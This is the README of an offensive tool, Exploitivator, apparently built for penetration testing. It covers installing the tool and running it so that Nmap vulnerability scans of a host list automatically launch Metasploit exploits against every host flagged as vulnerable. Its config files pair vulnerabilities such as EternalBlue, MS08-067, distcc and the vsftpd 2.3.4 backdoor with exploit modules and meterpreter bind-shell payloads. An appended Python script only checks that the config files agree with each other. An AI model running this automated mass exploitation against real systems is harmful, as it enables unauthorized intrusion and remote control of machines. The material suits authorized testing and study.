
============= Exploitivator

============= Prerequisites

This has only been tested on Kali.

It depends on the msfrpc module for Python, described in detail here: https://www.trustwave.com/Resources/SpiderLabs-Blog/Scripting-Metasploit-using-MSGRPC/

Install the necessary Kali packages and the PostgreSQL gem for Ruby:

    apt-get install postgresql libpq-dev git-core
    gem install pg

Install the current version of the msfrpc Python module from git:

    git clone git://github.com/SpiderLabs/msfrpc.git msfrpc
    cd msfrpc/python-msfrpc
    python setup.py install

===== Usage

Before running either of the scripts, load msfconsole and start the MSGRPC service.
MSGRPC can be started with msfrpcd in Metasploit as follows:

    load msgrpc Pass=abc123

The results of scans and/or exploitation will appear in the Metasploit console and in the output file(s) (msf_scan_output.txt and exploitivator_output.txt).

Use MSFScan to run multiple Metasploit scans against a group of target hosts. Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.


Exploitivator

Command line usage:

Examples: The application can be run as follows, where '10.128.108.178' is the IP address of the attack machine, 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password:

    ./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123


MSFScan

Command line usage:

    ./msf_scan.py filename
    ./msf_scan.py filename MSF_DB_Username MSF_DB_Password

Examples: The application can be run as follows, where 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password:

    ./msf_scan.py hosts.txt msf abc123

To run with 'hosts.txt' as a list of target hosts, using the script's default Metasploit Postgres username (msf) and the script's default Metasploit Postgres password (abc123):

    ./msf_scan.py hosts.txt

============ Config Files

Both scripts rely on config files to provide details of the required Nmap and Metasploit scans and attacks.


MSFScan

The script uses a config file with the name 'scan_types.cfg'. This contains a list of paths for any Metasploit scans that are to run against the targets, one per line, e.g.:

    auxiliary/scanner/dcerpc/endpoint_mapper
    auxiliary/scanner/smb/smb_version
    auxiliary/scanner/x11/open_x11
    auxiliary/scanner/discovery/ipv6_multicast_ping
    auxiliary/scanner/discovery/ipv6_neighbor
    auxiliary/scanner/smb/smb_login


Exploitivator

This script uses two config files (exploitivator_scan.cfg and exploitivator.cfg): one to specify Nmap scans and parameters (exploitivator_scan.cfg), and one to specify Metasploit exploits, payloads and parameters (exploitivator.cfg). Both use '##' as a field separator and have the following formats.

exploitivator_scan.cfg:

    [Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional - grep command to be used if Nmap's greppable output is being used]

In the above format:

  1. The first section is a label linking the scan to the exploit with the same label in exploitivator.cfg
  2. The second section is the part of the Nmap command line which specifies details of the type of scan to run, such as ports and script
  3. The third section is the part of the Nmap command line that defines the Nmap output file (Exploitivator handles XML or greppable Nmap output)
  4. The optional fourth section is the grep command that you wish to use in order to identify a vulnerable target within a '.gnmap' file

An example file content is shown below:

    SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml
    SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml
    SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml
    SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml
    SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml
    DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632/open/tcp//distccd"
    JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099/open/tcp//rmi"
    VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4"

exploitivator.cfg:

    [Label]##[Metasploit exploit path]##[Optional - Metasploit payload details]

An example file content is shown below:

    SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp
    SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp
    SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp
    SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp
    DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby
    JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp
    VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none
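The two '##'-separated config formats above, as an added example that is not part of the Exploitivator project: a small Python parser and consistency check for exploitivator_scan.cfg and exploitivator.cfg. The embedded sample contents are the README's own example entries. The function names and the lint rules (every scan label needs a matching exploit label, greppable output needs a grep command, output file names should not collide) are assumptions of this example, not behaviour the scripts are documented to enforce; run against the sample entries it reports that SMB_10-054 has a scan but no exploit entry.

```python
import shlex

# Sample config contents: the README's own example entries, embedded inline
# so the example runs without any files on disk.
SCAN_CFG = """\
SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml
SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml
SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml
SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml
SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml
DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632/open/tcp//distccd"
JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099/open/tcp//rmi"
VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4"
"""

EXPLOIT_CFG = """\
SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp
SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp
SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp
SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp
DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby
JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp
VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none
"""

SEP = "##"


def _split_lines(text, min_fields, max_fields, name):
    """Split each non-blank line on '##' and enforce the field count for that file type."""
    rows = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        fields = [f.strip() for f in line.split(SEP)]
        if not min_fields <= len(fields) <= max_fields:
            raise ValueError(f"{name} line {lineno}: expected {min_fields}-{max_fields} "
                             f"fields, got {len(fields)}")
        rows.append((lineno, fields))
    return rows


def parse_scan_cfg(text):
    """Parse exploitivator_scan.cfg text into {label: entry}; 3 or 4 fields per line."""
    entries = {}
    for lineno, fields in _split_lines(text, 3, 4, "exploitivator_scan.cfg"):
        label, nmap_args, output_args = fields[:3]
        grep_cmd = fields[3] if len(fields) == 4 else None
        if label in entries:
            raise ValueError(f"exploitivator_scan.cfg line {lineno}: duplicate label {label}")
        out_tokens = shlex.split(output_args)
        # The output mode is taken from the Nmap output flag: -oX (XML) or -oG (greppable)
        mode = "xml" if "-oX" in out_tokens else "gnmap" if "-oG" in out_tokens else None
        output_file = out_tokens[-1] if len(out_tokens) >= 2 else None
        entries[label] = {"nmap_args": nmap_args, "output_args": output_args,
                          "output_mode": mode, "output_file": output_file, "grep": grep_cmd}
    return entries


def parse_exploit_cfg(text):
    """Parse exploitivator.cfg text into {label: entry}; 2 or 3 fields per line."""
    entries = {}
    for lineno, fields in _split_lines(text, 2, 3, "exploitivator.cfg"):
        label, module = fields[:2]
        # A third field of 'none' (as in the VSFTPBackDoor entry) means no payload is given
        payload = fields[2] if len(fields) == 3 and fields[2].lower() != "none" else None
        if label in entries:
            raise ValueError(f"exploitivator.cfg line {lineno}: duplicate label {label}")
        entries[label] = {"module": module, "payload": payload}
    return entries


def check_config(scans, exploits):
    """Return a list of lint findings; an empty list means the two files are consistent."""
    findings = []
    seen_files = {}
    for label, scan in scans.items():
        if label not in exploits:
            findings.append(f"{label}: scan defined but no matching entry in exploitivator.cfg")
        if scan["output_mode"] is None:
            findings.append(f"{label}: output section has neither -oX nor -oG")
        if scan["output_mode"] == "gnmap" and not scan["grep"]:
            findings.append(f"{label}: greppable output but no grep command to match hosts")
        out = scan["output_file"]
        if out is not None:
            if out in seen_files:
                findings.append(f"{label}: output file {out} also used by {seen_files[out]}")
            seen_files[out] = label
    for label in exploits:
        if label not in scans:
            findings.append(f"{label}: exploit defined but no scan in exploitivator_scan.cfg")
    return findings


if __name__ == "__main__":
    for finding in check_config(parse_scan_cfg(SCAN_CFG), parse_exploit_cfg(EXPLOIT_CFG)):
        print(finding)
```

To lint real files, read them with open().read() and pass the text to the two parse functions; a ValueError reports the file and line number of any entry with the wrong number of fields.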

========== References

Starting and connecting to MSGRPC: https://www.packtpub.com/mapt/book/networking_and_servers/9781785280696/9/ch09lvl1sec60/metasploit-scripting-with-msgrpc

Setting RHOSTS to use a file instead of a range: http://travisaltman.com/metasploit-set-rhosts-file/
